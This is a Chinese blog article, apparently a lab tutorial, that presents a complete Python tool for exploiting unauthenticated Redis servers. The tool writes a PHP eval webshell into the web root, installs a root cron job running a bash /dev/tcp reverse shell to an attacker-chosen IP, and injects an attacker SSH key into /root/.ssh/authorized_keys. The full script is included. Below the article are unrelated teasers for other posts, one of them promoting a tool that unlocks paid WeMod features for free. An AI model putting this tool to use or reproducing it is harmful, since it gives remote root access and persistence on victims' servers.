当前位置：首页 > news >正文

python脚本实现Redis未授权访问漏洞利用

news 2026/5/17 18:51:10

之前介绍过Redis未授权访问漏洞，本文使用python实现Redis未授权访问检测以及对应三种getshell。

1 测试环境准备

CentOS 7（192.168.198.66/24）：安装 Redis 服务器并用 root 权限开启服务，关闭保护模式；安装并开启 httpd 服务；开启 ssh 服务。

Kali（192.168.198.172/24）：测试脚本效果，模拟攻击机。

Win10：VS Code开发脚本，Xshell控制虚拟机。

2 未授权访问检测

首先需要检测 6379 端口是否开启，直接使用 socket 连接测试即可，is_port_open() 函数实现检测端口开启情况。

def is_port_open(host,port):s=socket.socket()s.settimeout(0.3)try:s.connect((host,port))except Exception as e:return Falseelse:return Truefinally:s.close()

然后尝试连接 Redis 服务器，这里用到redis模块中的StrictRedis(host,port,socket_timeout)，通过client_list() 方法获取客户列表查看是否连接成功。如果成功连接到 Redis 服务器， client_list() 的调用就不会抛出异常。

try:client = redis.StrictRedis(host=ip, port=port, socket_timeout=0.3)ok_lst = client.client_list()print('[+] Connected to the Redis server successfully...')
except Exception as e:print(f'[-] An unexpected error occurred: {e}')

3 写入webshell

Redis命令：

config set dir /var/www/html
config set dbfilename shell.php
set x "<?php @eval($_POST[123]); ?>"
save

对应的 redis 模块的方法：

client.config_set('dir','/var/www/html')
client.config_set('dbfilename','shell.php')
client.set('x','<?php @eval($_POST[123]); ?>')
client.save()

增加设置根目录一句话木马名称和密码功能：

def Webshell(client):try:df_dir='/var/www/html'web_dir=input('Please enter the root directory of the target machine\'s website, input nothing to use the default path: /var/www/html\n')web_dir=web_dir.strip()if not web_dir: web_dir=df_dirname=input('Please enter the name of the PHP file you want to upload: ')passwd=input('Please enter the connection password: ')client.config_set('dir',web_dir)client.config_set('dbfilename',name+'.php')client.set('x','<?php @eval($_POST['+passwd+']); ?>')client.save()print("[+] Webshell "+name+".php"+" uploaded successfully...")except Exception as e:print(f"[-] Webshell upload failed: {e}")

4 建立反弹连接

同理，这里利用定时任务实现反弹连接。先设置 Redis 数据库目录到系统定时任务目录，名字设置为 root （相当于修改 root 用户的定时任务），增加用户设定 IP 和端口监听功能。

def Reverse(client):try:client.config_set('dir','/var/spool/cron')client.config_set('dbfilename','root')ip=input('Set the attacker\'s IP address: ')port=input('Set the listening port: ')payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n'client.set('x',payload)client.save()print("[+] Reverse shell task created successfully...")except Exception as e:print(f"[-] Reverse shell creation failed: {e}")

5 SSH keys 免密登录

把 Redis 的目录设置为 /root/.ssh，保存文件为 authorized_keys，实现在靶机中 authorized_keys 写入攻击者 ssh 公钥。

def Ssh(client):try:sshkey=input('Enter the SSH key you have generated: ')client.config_set('dir','/root/.ssh')client.config_set('dbfilename','authorized_keys')client.set('x','\n\n'+sshkey+'\n\n')client.save()print("[+] SSH key injected successfully.")except Exception as e:print(f"[-] SSH key injection failed: {e}")

5 完整代码

import numpy as np
import socket
import redis
import sys
def Hello_FK_Redis():a,b=60,30x,y,r=30,15,13img=np.zeros((b,a),dtype=str)for i in range(b):for j in range(a):dist=np.sqrt((i-y)**2+(j-x)**2)if r-1<dist<r+1: img[i,j]='*'elif abs(j-x)<1 and dist<r: img[i,j]='|'elif abs(i-y)<1 and dist<r: img[i,j]='-'img[img=='']=' 'for i in img: print(''.join(i))print('----Welcome to use Redis Vulnerability Exploitation Tool----')
def is_port_open(host,port):s=socket.socket()s.settimeout(0.3)try:s.connect((host,port))except Exception as e:return Falseelse:return Truefinally:s.close()
def Webshell(client):try:df_dir='/var/www/html'web_dir=input('Please enter the root directory of the target machine\'s website, input nothing to use the default path: /var/www/html\n')web_dir=web_dir.strip()if not web_dir: web_dir=df_dirname=input('Please enter the name of the PHP file you want to upload: ')passwd=input('Please enter the connection password: ')client.config_set('dir',web_dir)client.config_set('dbfilename',name+'.php')client.set('x','<?php @eval($_POST['+passwd+']); ?>')client.save()print("[+] Webshell "+name+".php"+" uploaded successfully...")except Exception as e:print(f"[-] Webshell upload failed: {e}")def Reverse(client):try:client.config_set('dir','/var/spool/cron')client.config_set('dbfilename','root')ip=input('Set the attacker\'s IP address: ')port=input('Set the listening port: ')ip=ip.strip()port=port.strip()payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n'client.set('x',payload)client.save()print("[+] Reverse shell task created successfully...")except Exception as e:print(f"[-] Reverse shell creation failed: {e}")
def Ssh(client):try:sshkey=input('Enter the SSH key you have generated: ')client.config_set('dir','/root/.ssh')client.config_set('dbfilename','authorized_keys')client.set('x','\n\n'+sshkey+'\n\n')client.save()print("[+] SSH key injected successfully.")except Exception as e:print(f"[-] SSH key injection failed: {e}")
if __name__ == '__main__':Hello_FK_Redis()ip=input('Please enter the target machine\'s IP address: ')port=6379if is_port_open(ip,port):print('[+] Port 6379 is open...')print('[*] Trying to connect Redis server...')try:client=redis.StrictRedis(host=ip,port=port,socket_timeout=0.3)ok_lst=client.client_list()print('[+] Connected to the Redis server successfully...')print('Please choose the exploit method you want to use:\nEnter 1 for webshell\nEnter 2 for establishing a reverse connection\nEnter 3 for SSH key-based authentication\nOr any other character to exit...')try:c=int(input())if c==1: Webshell(client)elif c==2: Reverse(client)elif c==3: Ssh(client)else: print('[*] Exiting...')sys.exit()except Exception:print('[*] Exiting...')sys.exit()except Exception as e:print(f'[-] An unexpected error occurred: {e}')else:print('[-] Port 6379 is not open...')

6 测试效果

webshell

反弹连接

监听端口：7777

下面输入攻击机端口保证与监听的攻击机和端口一致：

免密登录

在 kali 中 .ssh 复制公钥 id_rsa.pub 的内容

免密登录：

python脚本实现Redis未授权访问漏洞利用

之前介绍过Redis未授权访问漏洞，本文使用python实现Redis未授权访问检测以及对应三种getshell。 1 测试环境准备 CentOS 7（192.168.198.66/24）：安装 Redis 服务器并用 root 权限开启服务，关闭保护模式；安…...

编程日记 2024/10/7 15:21:55

简单线性回归分析-基于R语言

本题中，在不含截距的简单线性回归中，用零假设对统计量进行假设检验。首先，我们使用下面方法生成预测变量x和响应变量y。 set.seed(1) x <- rnorm(100) y <- 2*xrnorm(100) （a）不含截距的线性回归模型构建。 &…...

编程日记 2024/10/7 15:20:54

上海理工大学《2023年+2019年867自动控制原理真题》 (完整版）

本文内容，全部选自自动化考研联盟的：《上海理工大学867自控考研资料》的真题篇。后续会持续更新更多学校，更多年份的真题，记得关注哦~ 目录 2023年真题 2019年真题 Part1：2023年2019年完整版真题 2023年真题 2019年…...

编程日记 2024/10/7 15:18:52

计算机网络面试题——第三篇

1. TCP超时重传机制是为了解决什么问题因为TCP是一种面向连接的协议，需要保证数据可靠传输。而在数据传输过程中，由于网络阻塞、链路错误等原因，数据包可能会丢失或者延迟到达目的地。因此，若未在指定时间内收到对方的确认应答&…...

编程日记 2024/10/7 15:16:49

Elasticsearch 开放推理 API 增加了对 Google AI Studio 的支持

作者：来自 Elastic Jeff Vestal 我们很高兴地宣布 Elasticsearch 的开放推理 API 支持 Gemini 开发者 API。使用 Google AI Studio 时，开发者现在可以与 Elasticsearch 索引中的数据进行聊天、运行实验并使用 Google Cloud 的模型（例如 Gemin…...

编程日记 2024/10/7 15:15:48

react-问卷星项目（7）

实战 React表单组件入门重点在于change的时候改变state的值，类似vue的双向数据绑定v-model，即数据更新的时候页面同步更新，页面数据更新时数据源也能获得最新的值，只是Vue中设置在data中的属性默认绑定，React中需…...

编程日记 2024/10/7 15:14:47

很久没合并代码合并出现冲突，自动进入了 main|REBASE 2/6 的提示: 【git】main|REBASE 2/6 It looks like you’ve encountered several merge conflicts after a git pull operation while a rebase is in progress. Here’s how you can resolve these conflict…...

编程日记 2024/10/7 15:13:46

51单片机的水质检测系统【proteus仿真+程序+报告+原理图+演示视频】

1、主要功能该系统由AT89C51/STC89C52单片机LCD1602显示模块温度传感器ph传感器浑浊度传感器蓝牙继电器LED、按键和蜂鸣器等模块构成。适用于水质监测系统，含检测和调整水温、浑浊度、ph等相似项目。可实现功能: 1、LCD1602实时显示水温、水体ph和浑浊度 2、温…...

编程日记 2024/10/7 15:12:45

【python面试宝典7】线程池，模块和包

目录标题目37：解释一下线程池的工作原理。题目38：举例说明什么情况下会出现KeyError、TypeError、ValueError。题目39：说出下面代码的运行结果。题目40：如何读取大文件，例如内存只有4G，如何读取一个大小为…...

编程日记 2024/10/7 15:10:42

Android input系统原理二

1.inputmanager启动源码分析在SystemServer.java中构造了 inputmanagerservice的对象，在其构造函数中，最重要的是这个nativeInit函数。下面是核心代码 inputManager new InputManagerService(context);public InputManagerService(Context context)…...

编程日记 2024/10/7 15:09:41

Oracle登录报错-ORA-01017: invalid username/password；logon denied

接上文：Oracle创建用户报错-ORA-65096: invalid common user or role name 我以为按照上文在PDB里创建了用户，我以为就可以用PLSQL远程连接了，远程服务器上也安装了对应版本的Oracle客户端，但是我想多了，客户只是新建…...

编程日记 2024/10/7 15:08:40

JavaScript 获取浏览器本地数据的4种方式

JavaScript 获取浏览器本地数据的方式我们在做Web开发中，客户端存储机制对于在浏览器中持久化数据至关重要。这些机制允许开发者存储用户偏好设置、应用状态以及其他关键信息，从而增强用户体验。本文将介绍几种常用的JavaScript获取浏览器本地数据的方…...

编程日记 2024/10/7 15:07:39

77寸OLED透明触摸屏有哪些应用场景

说到77寸OLED透明触摸屏，那可真是市场营销中的一大亮点，应用场景多到数不清！我这就给你细数几个热门的： 商业展示：这可是77寸OLED透明触摸屏的拿手好戏！在高端零售店铺里，它可以作为陈列窗口&am…...

编程日记 2024/10/7 15:05:36

二分解题的奇技淫巧都有哪些，你还不会吗？

先说一下我为什么要写这篇文章。 “二分“ 查找 or ”二分“ 答案的思想大家想必都知道吧（如果不懂，可以看一下我之前写的一篇文章）。二分求解可是呢？思想都会，做题的时候，就懵圈了。这个题竟然考的是…...

编程日记 2024/10/7 15:04:35

LeetCode-871 最低加油次数

重启力扣每日一题系列！ 因为过去两个月里掉粉掉的好严重，我想大抵是因为更新的频率不如上半年了，如果我重启了每日一题系列那岂不是至少是每日一更☝🤓？ 也不是每天都更，我有两不更，特难的就不…...

编程日记 2024/10/7 15:03:34

OpenCV-OCR

文章目录一、OCR技术的基本原理二、OpenCV在OCR识别中的应用1.图像预处理2.文字区域检测3.OCR识别：4.后处理： 三、OCR识别示例代码四、注意事项 OpenCV-OCR主要涉及使用OpenCV库进行光学字符识别（OCR）的技术。OCR技术可以识别图像…...

编程日记 2024/10/7 15:00:31

Linux卸载mysql

一、查看当前安装mysql情况，查找以前是否装有mysql rpm -qa|grep -i mysql二、停止MySQL服务三、删除mysql库和文件查找MySQL库 # 查找命令 find / -name mysql# 显示结果 /var/lib/mysql/var/lib/mysql/mysql/usr/lib64/mysql删除对应的mysql目录 rm -rf /v…...

编程日记 2024/10/7 14:56:27

【大语言模型-论文精读】用于医疗领域摘要任务的大型语言模型评估综述

【大语言模型-论文精读】用于医疗领域摘要任务的大型语言模型评估综述论文信息： 用于医疗领域摘要任务的大型语言模型评估：一篇叙述性综述， 文章是由 Emma Croxford , Yanjun Gao 博士 , Nicholas Pellegrino , Karen K. Wong 等人近期合作…...

编程日记 2024/10/7 14:55:26

图吧工具箱

图吧工具箱202309绿色版自动解压程序R2.exe，永久有效链接：https://pan.baidu.com/s/1M6TI7Git8bXOzZX_qZ3LJw?pwdzked 提取码：zked...

编程日记 2024/10/7 14:53:23

vue2 + View design 使用inputNumber设置默认值为undefined但展示数据为1且表单校验不通过的原因

文章目录一、背景二、操作步骤1.复现前的准备工作（1）vue版本和view design 版本（2）创建一个组件（组件中根据类型渲染不同的组件）（3）在list.vue页面中引入组件，传入配置&…...

编程日记 2024/10/7 14:52:22

从SolidWorks到Geant4仿真：我的第一个粒子探测器CAD模型导入全记录（含CADMesh避坑点）

从SolidWorks到Geant4仿真：我的第一个粒子探测器CAD模型导入全记录（含CADMesh避坑点） 作为一名刚接触粒子探测器仿真的研究生，我花了整整两周时间才成功将SolidWorks设计的模型导入Geant4进行模拟。这个过程远比想象中复杂&#x…...

编程新知 2026/5/17 11:06:07

终极跨平台漫画阅读方案：nhentai-cross全平台使用指南

终极跨平台漫画阅读方案：nhentai-cross全平台使用指南【免费下载链接】nhentai-cross A nhentai client 项目地址: https://gitcode.com/gh_mirrors/nh/nhentai-cross 你是否厌倦了在不同设备间切换漫画阅读应用？nhentai-cross正是为你量身定制…...

编程新知 2026/5/17 9:40:46

从SD卡初始化到读写文件：一个完整嵌入式项目中的SDIO驱动避坑实践

从SD卡初始化到读写文件：嵌入式SDIO驱动实战全解析在嵌入式系统开发中，SD卡因其高容量、低成本和便携性成为数据存储的首选方案。然而，看似简单的SD卡接口背后隐藏着复杂的初始化协议和时序要求。许多工程师在项目初期都会遇到SD卡无法识别、…...

编程新知 2026/5/17 9:18:37

【CH32V307实战】4P OLED屏I2C驱动移植与快速显示指南

1. CH32V307与4P OLED屏的硬件连接指南第一次拿到CH32V307开发板和4P OLED屏时，最让我头疼的就是接线问题。这种4线制OLED（通常标注为4P或4PIN）相比传统的7线制简化了不少，但引脚定义各家厂商可能略有差异。经过多次实测&#xf…...

编程新知 2026/5/17 9:18:37

Wand-Enhancer：零成本解锁WeMod高级功能的完整指南

Wand-Enhancer：零成本解锁WeMod高级功能的完整指南【免费下载链接】Wand-Enhancer Advanced UX and interoperability extension for Wand (WeMod) app 项目地址: https://gitcode.com/gh_mirrors/we/Wand-Enhancer 还在为WeMod专业版的订阅费用而犹豫不决吗…...

编程新知 2026/5/17 8:52:12